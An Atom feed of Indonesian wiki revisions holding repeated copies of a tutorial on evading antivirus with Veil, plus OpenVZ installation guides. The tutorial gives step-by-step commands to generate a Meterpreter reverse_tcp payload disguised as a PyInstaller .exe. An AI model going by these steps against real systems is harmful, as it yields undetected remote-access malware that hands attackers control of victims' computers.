Hasilnya payload akan disimpan di /root/Veil-master/output/compiled/&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [[Linux Howto]]&lt;br /&gt;
* [[Backtrack]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=ByPass_Antivirus_Dengan_Veil&amp;diff=38876</id>
		<title>ByPass Antivirus Dengan Veil</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=ByPass_Antivirus_Dengan_Veil&amp;diff=38876"/>
		<updated>2013-12-08T04:45:29Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* Pranala Menarik */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==ByPass Antivirus Dengan Veil==&lt;br /&gt;
===Pendahuluan===&lt;br /&gt;
Payload yang diinject dengan menggunakan Metasploit biasanya terdeteksi oleh antivirus. Kita bisa membypass antivirusnya dengan menyamarkan payloadnya dengan Veil.&lt;br /&gt;
&lt;br /&gt;
===Instalasi Veil===&lt;br /&gt;
    wget https://github.com/ChrisTruncer/Veil/archive/master.zip&lt;br /&gt;
    unzip master.zip&lt;br /&gt;
    cd Veil-master/setup&lt;br /&gt;
    cd ..&lt;br /&gt;
    ./setup.sh&lt;br /&gt;
&lt;br /&gt;
===Penggunaan===&lt;br /&gt;
Setelah instalasi, jalankan veilnya&lt;br /&gt;
 ./Veil&lt;br /&gt;
	&lt;br /&gt;
Ada 18 payload yang sudah siap digunakan. Untuk melihat daftar payloadnya kita gunakan perintah &amp;quot;use&amp;quot;&lt;br /&gt;
 use&lt;br /&gt;
&lt;br /&gt;
Sebagai contoh kita pilih payload python/b64VirtualAlloc dengan mengetik angka 18&lt;br /&gt;
 18&lt;br /&gt;
	&lt;br /&gt;
Selanjutnya kita ketik perintah &amp;quot;generate&amp;quot; untuk menggenerate payloadnya&lt;br /&gt;
 generate&lt;br /&gt;
	&lt;br /&gt;
Setelah itu kita pilih msfvenom dengan mengetik angka &amp;quot;1&amp;quot;&lt;br /&gt;
 1&lt;br /&gt;
&lt;br /&gt;
Lalu kita berikan detail payloadnya misal&lt;br /&gt;
 Enter metasploit payload: “windows/meterpreter/reverse_tcp“&lt;br /&gt;
 Enter value for ‘LHOST’, [tab] for local IP: “192.168.0.111&amp;quot;&lt;br /&gt;
 Enter value for ‘LPORT’: “443“&lt;br /&gt;
	&lt;br /&gt;
Setelah payload digenerate kita beri nama payloadnya misalkan &amp;quot;bypass&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Kita akan gunakan Pyinstaller untuk membuat file .exe. Ketik &amp;quot;1&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Hasilnya payload akan disimpan di /root/Veil-master/output/compiled/&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [[Linux How To]]&lt;br /&gt;
* [[Backtrack]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=ByPass_Antivirus_Dengan_Veil&amp;diff=38875</id>
		<title>ByPass Antivirus Dengan Veil</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=ByPass_Antivirus_Dengan_Veil&amp;diff=38875"/>
		<updated>2013-12-08T04:44:49Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* Penggunaan */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==ByPass Antivirus Dengan Veil==&lt;br /&gt;
===Pendahuluan===&lt;br /&gt;
Payload yang diinject dengan menggunakan Metasploit biasanya terdeteksi oleh antivirus. Kita bisa membypass antivirusnya dengan menyamarkan payloadnya dengan Veil.&lt;br /&gt;
&lt;br /&gt;
===Instalasi Veil===&lt;br /&gt;
    wget https://github.com/ChrisTruncer/Veil/archive/master.zip&lt;br /&gt;
    unzip master.zip&lt;br /&gt;
    cd Veil-master/setup&lt;br /&gt;
    cd ..&lt;br /&gt;
    ./setup.sh&lt;br /&gt;
&lt;br /&gt;
===Penggunaan===&lt;br /&gt;
Setelah instalasi, jalankan veilnya&lt;br /&gt;
 ./Veil&lt;br /&gt;
	&lt;br /&gt;
Ada 18 payload yang sudah siap digunakan. Untuk melihat daftar payloadnya kita gunakan perintah &amp;quot;use&amp;quot;&lt;br /&gt;
 use&lt;br /&gt;
&lt;br /&gt;
Sebagai contoh kita pilih payload python/b64VirtualAlloc dengan mengetik angka 18&lt;br /&gt;
 18&lt;br /&gt;
	&lt;br /&gt;
Selanjutnya kita ketik perintah &amp;quot;generate&amp;quot; untuk menggenerate payloadnya&lt;br /&gt;
 generate&lt;br /&gt;
	&lt;br /&gt;
Setelah itu kita pilih msfvenom dengan mengetik angka &amp;quot;1&amp;quot;&lt;br /&gt;
 1&lt;br /&gt;
&lt;br /&gt;
Lalu kita berikan detail payloadnya misal&lt;br /&gt;
 Enter metasploit payload: “windows/meterpreter/reverse_tcp“&lt;br /&gt;
 Enter value for ‘LHOST’, [tab] for local IP: “192.168.0.111&amp;quot;&lt;br /&gt;
 Enter value for ‘LPORT’: “443“&lt;br /&gt;
	&lt;br /&gt;
Setelah payload digenerate kita beri nama payloadnya misalkan &amp;quot;bypass&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Kita akan gunakan Pyinstaller untuk membuat file .exe. Ketik &amp;quot;1&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Hasilnya payload akan disimpan di /root/Veil-master/output/compiled/&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [[Linux HowTo]]&lt;br /&gt;
* [[Backtrack]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=ByPass_Antivirus_Dengan_Veil&amp;diff=38874</id>
		<title>ByPass Antivirus Dengan Veil</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=ByPass_Antivirus_Dengan_Veil&amp;diff=38874"/>
		<updated>2013-12-08T04:43:58Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* Instalasi Veil */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==ByPass Antivirus Dengan Veil==&lt;br /&gt;
===Pendahuluan===&lt;br /&gt;
Payload yang diinject dengan menggunakan Metasploit biasanya terdeteksi oleh antivirus. Kita bisa membypass antivirusnya dengan menyamarkan payloadnya dengan Veil.&lt;br /&gt;
&lt;br /&gt;
===Instalasi Veil===&lt;br /&gt;
    wget https://github.com/ChrisTruncer/Veil/archive/master.zip&lt;br /&gt;
    unzip master.zip&lt;br /&gt;
    cd Veil-master/setup&lt;br /&gt;
    cd ..&lt;br /&gt;
    ./setup.sh&lt;br /&gt;
&lt;br /&gt;
===Penggunaan===&lt;br /&gt;
Setelah instalasi, jalankan veilnya&lt;br /&gt;
	./Veil&lt;br /&gt;
	&lt;br /&gt;
Ada 18 payload yang sudah siap digunakan. Untuk melihat daftar payloadnya kita gunakan perintah &amp;quot;use&amp;quot;&lt;br /&gt;
	use&lt;br /&gt;
&lt;br /&gt;
Sebagai contoh kita pilih payload python/b64VirtualAlloc dengan mengetik angka 18&lt;br /&gt;
	18&lt;br /&gt;
	&lt;br /&gt;
Selanjutnya kita ketik perintah &amp;quot;generate&amp;quot; untuk menggenerate payloadnya&lt;br /&gt;
	generate&lt;br /&gt;
	&lt;br /&gt;
Setelah itu kita pilih msfvenom dengan mengetik angka &amp;quot;1&amp;quot;&lt;br /&gt;
	1&lt;br /&gt;
&lt;br /&gt;
Lalu kita berikan detail payloadnya misal&lt;br /&gt;
	Enter metasploit payload: “windows/meterpreter/reverse_tcp“&lt;br /&gt;
	Enter value for ‘LHOST’, [tab] for local IP: “192.168.0.111&amp;quot;&lt;br /&gt;
	Enter value for ‘LPORT’: “443“&lt;br /&gt;
	&lt;br /&gt;
Setelah payload digenerate kita beri nama payloadnya misalkan &amp;quot;bypass&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Kita akan gunakan Pyinstaller untuk membuat file .exe. Ketik &amp;quot;1&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Hasilnya payload akan disimpan di /root/Veil-master/output/compiled/&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [[Linux HowTo]]&lt;br /&gt;
* [[Backtrack]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=ByPass_Antivirus_Dengan_Veil&amp;diff=38873</id>
		<title>ByPass Antivirus Dengan Veil</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=ByPass_Antivirus_Dengan_Veil&amp;diff=38873"/>
		<updated>2013-12-08T04:43:36Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: New page: ==ByPass Antivirus Dengan Veil== ===Pendahuluan=== Payload yang diinject dengan menggunakan Metasploit biasanya terdeteksi oleh antivirus. Kita bisa membypass antivirusnya dengan menyamark...&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==ByPass Antivirus Dengan Veil==&lt;br /&gt;
===Pendahuluan===&lt;br /&gt;
Payload yang diinject dengan menggunakan Metasploit biasanya terdeteksi oleh antivirus. Kita bisa membypass antivirusnya dengan menyamarkan payloadnya dengan Veil.&lt;br /&gt;
&lt;br /&gt;
===Instalasi Veil===&lt;br /&gt;
    wget https://github.com/ChrisTruncer/Veil/archive/master.zip&lt;br /&gt;
&lt;br /&gt;
    unzip master.zip&lt;br /&gt;
&lt;br /&gt;
    cd Veil-master/setup&lt;br /&gt;
&lt;br /&gt;
    cd ..&lt;br /&gt;
&lt;br /&gt;
    ./setup.sh&lt;br /&gt;
	&lt;br /&gt;
===Penggunaan===&lt;br /&gt;
Setelah instalasi, jalankan veilnya&lt;br /&gt;
	./Veil&lt;br /&gt;
	&lt;br /&gt;
Ada 18 payload yang sudah siap digunakan. Untuk melihat daftar payloadnya kita gunakan perintah &amp;quot;use&amp;quot;&lt;br /&gt;
	use&lt;br /&gt;
&lt;br /&gt;
Sebagai contoh kita pilih payload python/b64VirtualAlloc dengan mengetik angka 18&lt;br /&gt;
	18&lt;br /&gt;
	&lt;br /&gt;
Selanjutnya kita ketik perintah &amp;quot;generate&amp;quot; untuk menggenerate payloadnya&lt;br /&gt;
	generate&lt;br /&gt;
	&lt;br /&gt;
Setelah itu kita pilih msfvenom dengan mengetik angka &amp;quot;1&amp;quot;&lt;br /&gt;
	1&lt;br /&gt;
&lt;br /&gt;
Lalu kita berikan detail payloadnya misal&lt;br /&gt;
	Enter metasploit payload: “windows/meterpreter/reverse_tcp“&lt;br /&gt;
	Enter value for ‘LHOST’, [tab] for local IP: “192.168.0.111&amp;quot;&lt;br /&gt;
	Enter value for ‘LPORT’: “443“&lt;br /&gt;
	&lt;br /&gt;
Setelah payload digenerate kita beri nama payloadnya misalkan &amp;quot;bypass&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Kita akan gunakan Pyinstaller untuk membuat file .exe. Ketik &amp;quot;1&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Hasilnya payload akan disimpan di /root/Veil-master/output/compiled/&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [[Linux HowTo]]&lt;br /&gt;
* [[Backtrack]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Instalasi_OpenVZ_di_CentOS_5&amp;diff=38702</id>
		<title>Instalasi OpenVZ di CentOS 5</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Instalasi_OpenVZ_di_CentOS_5&amp;diff=38702"/>
		<updated>2013-11-12T12:06:10Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* Pranala Menarik */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Instalasi OpenVZ==&lt;br /&gt;
&lt;br /&gt;
Tambahkan repository OpenVZ ke yum:&lt;br /&gt;
&lt;br /&gt;
 cd /etc/yum.repos.d&lt;br /&gt;
 wget http://download.openvz.org/openvz.repo&lt;br /&gt;
 rpm --import http://download.openvz.org/RPM-GPG-Key-OpenVZ&lt;br /&gt;
&lt;br /&gt;
Buka openvz.repo&lt;br /&gt;
&lt;br /&gt;
 vi openvz.repo&lt;br /&gt;
&lt;br /&gt;
Matikan repository [openvz-kernel-rhel6] (enabled=0) dan hidupkan repository [openvz-kernel-rhel5] (enabled=1):&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 [openvz-kernel-rhel6]&lt;br /&gt;
 name=OpenVZ RHEL6-based kernel&lt;br /&gt;
 #baseurl=http://download.openvz.org/kernel/branches/rhel6-2.6.32/current/&lt;br /&gt;
 mirrorlist=http://download.openvz.org/kernel/mirrors-rhel6-2.6.32&lt;br /&gt;
 enabled=0&lt;br /&gt;
 gpgcheck=1&lt;br /&gt;
 gpgkey=http://download.openvz.org/RPM-GPG-Key-OpenVZ&lt;br /&gt;
 &lt;br /&gt;
 [openvz-kernel-rhel5]&lt;br /&gt;
 name=OpenVZ RHEL5-based kernel&lt;br /&gt;
 #baseurl=http://download.openvz.org/kernel/branches/rhel5-2.6.18/current/&lt;br /&gt;
 mirrorlist=http://download.openvz.org/kernel/mirrors-rhel5-2.6.18&lt;br /&gt;
 enabled=1&lt;br /&gt;
 gpgcheck=1&lt;br /&gt;
 gpgkey=http://download.openvz.org/RPM-GPG-Key-OpenVZ&lt;br /&gt;
 &lt;br /&gt;
 [openvz-kernel-rhel4]&lt;br /&gt;
 name=OpenVZ RHEL4-based kernel&lt;br /&gt;
 #baseurl=http://download.openvz.org/kernel/branches/rhel4-2.6.9/current/&lt;br /&gt;
 mirrorlist=http://download.openvz.org/kernel/mirrors-rhel4-2.6.9&lt;br /&gt;
 enabled=0&lt;br /&gt;
 gpgcheck=1&lt;br /&gt;
 gpgkey=http://download.openvz.org/RPM-GPG-Key-OpenVZ&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
Cari kernel yang sesuai dengan mesin anda&lt;br /&gt;
&lt;br /&gt;
 yum search ovzkernel&lt;br /&gt;
&lt;br /&gt;
Hasilnya:&lt;br /&gt;
&lt;br /&gt;
 [root@server1 yum.repos.d]# yum search vzkernel&lt;br /&gt;
 ...&lt;br /&gt;
 ovzkernel.i686 : Virtuozzo Linux kernel (the core of the Linux operating system)&lt;br /&gt;
 ovzkernel.x86_64 : Virtuozzo Linux kernel (the core of the Linux operating system)&lt;br /&gt;
 ovzkernel-PAE.i686 : The Linux kernel compiled for PAE capable machines.&lt;br /&gt;
 ovzkernel-PAE-devel.i686 : Development package for building kernel modules to match the PAE kernel.&lt;br /&gt;
 ovzkernel-devel.i686 : Development package for building kernel modules to match the kernel.&lt;br /&gt;
 ovzkernel-devel.x86_64 : Development package for building kernel modules to match the kernel.&lt;br /&gt;
 ovzkernel-ent.i686 : The Linux kernel compiled for huge mem capable machines.&lt;br /&gt;
 ovzkernel-ent-devel.i686 : Development package for building kernel modules to match the ent kernel.&lt;br /&gt;
 ovzkernel-xen.i686 : The Linux kernel compiled for Xen VM operations&lt;br /&gt;
 ovzkernel-xen.x86_64 : The Linux kernel compiled for Xen VM operations&lt;br /&gt;
 ovzkernel-xen-devel.i686 : Development package for building kernel modules to match the kernel.&lt;br /&gt;
 ovzkernel-xen-devel.x86_64 : Development package for building kernel modules to match the kernel.&lt;br /&gt;
 [root@server1 yum.repos.d]#&lt;br /&gt;
&lt;br /&gt;
Pilih salah satu yang sesuai dengan arsitektur mesin anda&lt;br /&gt;
&lt;br /&gt;
Pada sistem x86_64:&lt;br /&gt;
&lt;br /&gt;
 yum install ovzkernel.x86_64&lt;br /&gt;
&lt;br /&gt;
Pada sistem i686:&lt;br /&gt;
&lt;br /&gt;
 yum install ovzkernel.i686&lt;br /&gt;
&lt;br /&gt;
Secara otomatis GRUB bootloader akan terupdate. Silahkan buka /boot/grub/menu.lst untuk memastikan OpenVZ kernel berada di posisi paling atas dibanding kernel yang lain&lt;br /&gt;
&lt;br /&gt;
 cat /boot/grub/menu.lst&lt;br /&gt;
 &lt;br /&gt;
 # grub.conf generated by anaconda&lt;br /&gt;
 #&lt;br /&gt;
 # Note that you do not have to rerun grub after making changes to this file&lt;br /&gt;
 # NOTICE:  You have a /boot partition.  This means that&lt;br /&gt;
 #          all kernel and initrd paths are relative to /boot/, eg.&lt;br /&gt;
 #          root (hd0,0)&lt;br /&gt;
 #          kernel /vmlinuz-version ro root=/dev/VolGroup00/LogVol00&lt;br /&gt;
 #          initrd /initrd-version.img&lt;br /&gt;
 #boot=/dev/sda&lt;br /&gt;
 default=0&lt;br /&gt;
 timeout=5&lt;br /&gt;
 splashimage=(hd0,0)/grub/splash.xpm.gz&lt;br /&gt;
 hiddenmenu&lt;br /&gt;
 title OpenVZ (2.6.18-274.el5.028stab093.2)&lt;br /&gt;
         root (hd0,0)&lt;br /&gt;
         kernel /vmlinuz-2.6.18-274.el5.028stab093.2 ro root=/dev/VolGroup00/LogVol00 selinux=0&lt;br /&gt;
         initrd /initrd-2.6.18-274.el5.028stab093.2.img&lt;br /&gt;
 title CentOS (2.6.18-274.el5)&lt;br /&gt;
         root (hd0,0)&lt;br /&gt;
         kernel /vmlinuz-2.6.18-274.el5 ro root=/dev/VolGroup00/LogVol00&lt;br /&gt;
         initrd /initrd-2.6.18-274.el5.img &lt;br /&gt;
&lt;br /&gt;
Sekarang install peralatan untuk pengguna OpenVZ:&lt;br /&gt;
&lt;br /&gt;
 yum install vzctl vzquota&lt;br /&gt;
&lt;br /&gt;
Buka /etc/sysctl.conf dan pastikan konfigurasinya seperti di bawah ini:&lt;br /&gt;
&lt;br /&gt;
 vi /etc/sysctl.conf&lt;br /&gt;
 &lt;br /&gt;
 [...]&lt;br /&gt;
 net.ipv4.ip_forward = 1&lt;br /&gt;
 net.ipv4.conf.default.proxy_arp = 0&lt;br /&gt;
 net.ipv4.conf.all.rp_filter = 1&lt;br /&gt;
 kernel.sysrq = 1&lt;br /&gt;
 net.ipv4.conf.default.send_redirects = 1&lt;br /&gt;
 net.ipv4.conf.all.send_redirects = 0&lt;br /&gt;
 net.ipv4.icmp_echo_ignore_broadcasts=1&lt;br /&gt;
 net.ipv4.conf.default.forwarding=1&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Jika IP Address yang akan anda gunakan pada VPS anda menggunakan subnet yang berbeda dengan IP Address milik host system, maka anda wajib melakukan perubahan pada vz.conf seperti di bawah ini:&lt;br /&gt;
&lt;br /&gt;
Buka /etc/vz/vz.conf dan set NEIGHBOUR_DEVS ke all:&lt;br /&gt;
&lt;br /&gt;
 vi /etc/vz/vz.conf&lt;br /&gt;
 &lt;br /&gt;
 [...]&lt;br /&gt;
 NEIGHBOUR_DEVS=all&lt;br /&gt;
 [...] &lt;br /&gt;
&lt;br /&gt;
SELinux harus dimatikan jika anda ingin menggunakan OpenVZ. Buka /etc/sysconfig/selinux dan set nilai dari SELINUX ke disabled:&lt;br /&gt;
&lt;br /&gt;
 vi /etc/sysconfig/selinux &lt;br /&gt;
 &lt;br /&gt;
 # This file controls the state of SELinux on the system.&lt;br /&gt;
 # SELINUX= can take one of these three values:&lt;br /&gt;
 #       enforcing - SELinux security policy is enforced.&lt;br /&gt;
 #       permissive - SELinux prints warnings instead of enforcing.&lt;br /&gt;
 #       disabled - SELinux is fully disabled.&lt;br /&gt;
 SELINUX=disabled&lt;br /&gt;
 # SELINUXTYPE= type of policy in use. Possible values are:&lt;br /&gt;
 #       targeted - Only targeted network daemons are protected.&lt;br /&gt;
 #       strict - Full SELinux protection.&lt;br /&gt;
 SELINUXTYPE=targeted &lt;br /&gt;
&lt;br /&gt;
Langkah terakhir adalah reboot server anda:&lt;br /&gt;
&lt;br /&gt;
 reboot&lt;br /&gt;
&lt;br /&gt;
==Referensi==&lt;br /&gt;
* http://www.howtoforge.com/installing-and-using-openvz-on-centos-5.7&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [[Linux HowTo]]&lt;br /&gt;
* [[Instalasi OpenVZ Web Panel]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Instalasi_OpenVZ_Web_Panel&amp;diff=38701</id>
		<title>Instalasi OpenVZ Web Panel</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Instalasi_OpenVZ_Web_Panel&amp;diff=38701"/>
		<updated>2013-11-12T12:05:35Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* Referensi= */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Deskripsi==&lt;br /&gt;
OpenVZ Web Panel adalah Web UI yang digunakan untuk mempermudah penggunaan / manajemen OpenVZ&lt;br /&gt;
&lt;br /&gt;
Sebelum anda menginstal OpenVZ Web Panel, pastikan OpenVZ sudah terinstal terlebih dahulu di mesn anda.&lt;br /&gt;
&lt;br /&gt;
==Tampilan==&lt;br /&gt;
[[Image:OpenVZWebPanel.png]]&lt;br /&gt;
&lt;br /&gt;
==Instalasi==&lt;br /&gt;
&lt;br /&gt;
Jalankan perintah berikut menggunakan user root:&lt;br /&gt;
&lt;br /&gt;
 wget -O - http://ovz-web-panel.googlecode.com/svn/installer/ai.sh | sh &lt;br /&gt;
&lt;br /&gt;
Setelah instalasi selesai buka link di bawah ini menggunakan browser anda:&lt;br /&gt;
&lt;br /&gt;
    http://&amp;lt;your-host&amp;gt;:3000 &lt;br /&gt;
&lt;br /&gt;
Default user: admin , default password: admin&lt;br /&gt;
Pastikan anda merubah password anda.&lt;br /&gt;
&lt;br /&gt;
==Referensi==&lt;br /&gt;
* http://code.google.com/p/ovz-web-panel/&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [[Instalasi OpenVZ di CentOS 5]]&lt;br /&gt;
* [[Linux HowTo]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Instalasi_OpenVZ_Web_Panel&amp;diff=38700</id>
		<title>Instalasi OpenVZ Web Panel</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Instalasi_OpenVZ_Web_Panel&amp;diff=38700"/>
		<updated>2013-11-12T12:05:13Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: New page: ==Deskripsi== OpenVZ Web Panel adalah Web UI yang digunakan untuk mempermudah penggunaan / manajemen OpenVZ  Sebelum anda menginstal OpenVZ Web Panel, pastikan OpenVZ sudah terinstal terle...&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Deskripsi==&lt;br /&gt;
OpenVZ Web Panel adalah Web UI yang digunakan untuk mempermudah penggunaan / manajemen OpenVZ&lt;br /&gt;
&lt;br /&gt;
Sebelum anda menginstal OpenVZ Web Panel, pastikan OpenVZ sudah terinstal terlebih dahulu di mesn anda.&lt;br /&gt;
&lt;br /&gt;
==Tampilan==&lt;br /&gt;
[[Image:OpenVZWebPanel.png]]&lt;br /&gt;
&lt;br /&gt;
==Instalasi==&lt;br /&gt;
&lt;br /&gt;
Jalankan perintah berikut menggunakan user root:&lt;br /&gt;
&lt;br /&gt;
 wget -O - http://ovz-web-panel.googlecode.com/svn/installer/ai.sh | sh &lt;br /&gt;
&lt;br /&gt;
Setelah instalasi selesai buka link di bawah ini menggunakan browser anda:&lt;br /&gt;
&lt;br /&gt;
    http://&amp;lt;your-host&amp;gt;:3000 &lt;br /&gt;
&lt;br /&gt;
Default user: admin , default password: admin&lt;br /&gt;
Pastikan anda merubah password anda.&lt;br /&gt;
&lt;br /&gt;
=Referensi==&lt;br /&gt;
* http://code.google.com/p/ovz-web-panel/&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik&lt;br /&gt;
* [[Instalasi OpenVZ di CentOS 5]]&lt;br /&gt;
* [[Linux HowTo]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=File:OpenVZWebPanel.png&amp;diff=38699</id>
		<title>File:OpenVZWebPanel.png</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=File:OpenVZWebPanel.png&amp;diff=38699"/>
		<updated>2013-11-12T12:01:05Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Instalasi_OpenVZ_di_CentOS_5&amp;diff=38698</id>
		<title>Instalasi OpenVZ di CentOS 5</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Instalasi_OpenVZ_di_CentOS_5&amp;diff=38698"/>
		<updated>2013-11-12T11:57:34Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* Pranala Menarik */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Instalasi OpenVZ==&lt;br /&gt;
&lt;br /&gt;
Tambahkan repository OpenVZ ke yum:&lt;br /&gt;
&lt;br /&gt;
 cd /etc/yum.repos.d&lt;br /&gt;
 wget http://download.openvz.org/openvz.repo&lt;br /&gt;
 rpm --import http://download.openvz.org/RPM-GPG-Key-OpenVZ&lt;br /&gt;
&lt;br /&gt;
Buka openvz.repo&lt;br /&gt;
&lt;br /&gt;
 vi openvz.repo&lt;br /&gt;
&lt;br /&gt;
Matikan repository [openvz-kernel-rhel6] (enabled=0) dan hidupkan repository [openvz-kernel-rhel5] (enabled=1):&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 [openvz-kernel-rhel6]&lt;br /&gt;
 name=OpenVZ RHEL6-based kernel&lt;br /&gt;
 #baseurl=http://download.openvz.org/kernel/branches/rhel6-2.6.32/current/&lt;br /&gt;
 mirrorlist=http://download.openvz.org/kernel/mirrors-rhel6-2.6.32&lt;br /&gt;
 enabled=0&lt;br /&gt;
 gpgcheck=1&lt;br /&gt;
 gpgkey=http://download.openvz.org/RPM-GPG-Key-OpenVZ&lt;br /&gt;
 &lt;br /&gt;
 [openvz-kernel-rhel5]&lt;br /&gt;
 name=OpenVZ RHEL5-based kernel&lt;br /&gt;
 #baseurl=http://download.openvz.org/kernel/branches/rhel5-2.6.18/current/&lt;br /&gt;
 mirrorlist=http://download.openvz.org/kernel/mirrors-rhel5-2.6.18&lt;br /&gt;
 enabled=1&lt;br /&gt;
 gpgcheck=1&lt;br /&gt;
 gpgkey=http://download.openvz.org/RPM-GPG-Key-OpenVZ&lt;br /&gt;
 &lt;br /&gt;
 [openvz-kernel-rhel4]&lt;br /&gt;
 name=OpenVZ RHEL4-based kernel&lt;br /&gt;
 #baseurl=http://download.openvz.org/kernel/branches/rhel4-2.6.9/current/&lt;br /&gt;
 mirrorlist=http://download.openvz.org/kernel/mirrors-rhel4-2.6.9&lt;br /&gt;
 enabled=0&lt;br /&gt;
 gpgcheck=1&lt;br /&gt;
 gpgkey=http://download.openvz.org/RPM-GPG-Key-OpenVZ&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
Cari kernel yang sesuai dengan mesin anda&lt;br /&gt;
&lt;br /&gt;
 yum search ovzkernel&lt;br /&gt;
&lt;br /&gt;
Hasilnya:&lt;br /&gt;
&lt;br /&gt;
 [root@server1 yum.repos.d]# yum search vzkernel&lt;br /&gt;
 ...&lt;br /&gt;
 ovzkernel.i686 : Virtuozzo Linux kernel (the core of the Linux operating system)&lt;br /&gt;
 ovzkernel.x86_64 : Virtuozzo Linux kernel (the core of the Linux operating system)&lt;br /&gt;
 ovzkernel-PAE.i686 : The Linux kernel compiled for PAE capable machines.&lt;br /&gt;
 ovzkernel-PAE-devel.i686 : Development package for building kernel modules to match the PAE kernel.&lt;br /&gt;
 ovzkernel-devel.i686 : Development package for building kernel modules to match the kernel.&lt;br /&gt;
 ovzkernel-devel.x86_64 : Development package for building kernel modules to match the kernel.&lt;br /&gt;
 ovzkernel-ent.i686 : The Linux kernel compiled for huge mem capable machines.&lt;br /&gt;
 ovzkernel-ent-devel.i686 : Development package for building kernel modules to match the ent kernel.&lt;br /&gt;
 ovzkernel-xen.i686 : The Linux kernel compiled for Xen VM operations&lt;br /&gt;
 ovzkernel-xen.x86_64 : The Linux kernel compiled for Xen VM operations&lt;br /&gt;
 ovzkernel-xen-devel.i686 : Development package for building kernel modules to match the kernel.&lt;br /&gt;
 ovzkernel-xen-devel.x86_64 : Development package for building kernel modules to match the kernel.&lt;br /&gt;
 [root@server1 yum.repos.d]#&lt;br /&gt;
&lt;br /&gt;
Pilih salah satu yang sesuai dengan arsitektur mesin anda&lt;br /&gt;
&lt;br /&gt;
Pada sistem x86_64:&lt;br /&gt;
&lt;br /&gt;
 yum install ovzkernel.x86_64&lt;br /&gt;
&lt;br /&gt;
Pada sistem i686:&lt;br /&gt;
&lt;br /&gt;
 yum install ovzkernel.i686&lt;br /&gt;
&lt;br /&gt;
Secara otomatis GRUB bootloader akan terupdate. Silahkan buka /boot/grub/menu.lst untuk memastikan OpenVZ kernel berada di posisi paling atas dibanding kernel yang lain&lt;br /&gt;
&lt;br /&gt;
 cat /boot/grub/menu.lst&lt;br /&gt;
 &lt;br /&gt;
 # grub.conf generated by anaconda&lt;br /&gt;
